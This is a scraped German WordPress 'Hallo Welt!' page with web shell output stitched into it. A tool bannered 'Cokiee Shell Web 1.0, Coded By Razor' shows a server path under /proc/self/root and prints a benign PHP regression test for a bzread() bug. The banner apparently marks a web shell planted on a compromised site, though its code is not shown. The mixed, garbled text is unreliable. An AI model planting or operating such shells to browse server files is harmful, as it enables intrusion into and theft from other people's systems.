Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/bz2/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/bz2/tests/bug72613.phpt |
--TEST-- Bug #72613 (Inadequate error handling in bzread()) --SKIPIF-- <?php if (!extension_loaded("bz2")) print "skip"; ?> --FILE-- <?php $fp = bzopen(__DIR__.'/72613.bz2', 'r'); if ($fp === FALSE) { exit("ERROR: bzopen()"); } $data = ""; while (!feof($fp)) { $res = bzread($fp); if ($res === FALSE) { exit("ERROR: bzread()"); } $data .= $res; } bzclose($fp); ?> DONE --EXPECT-- DONE
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare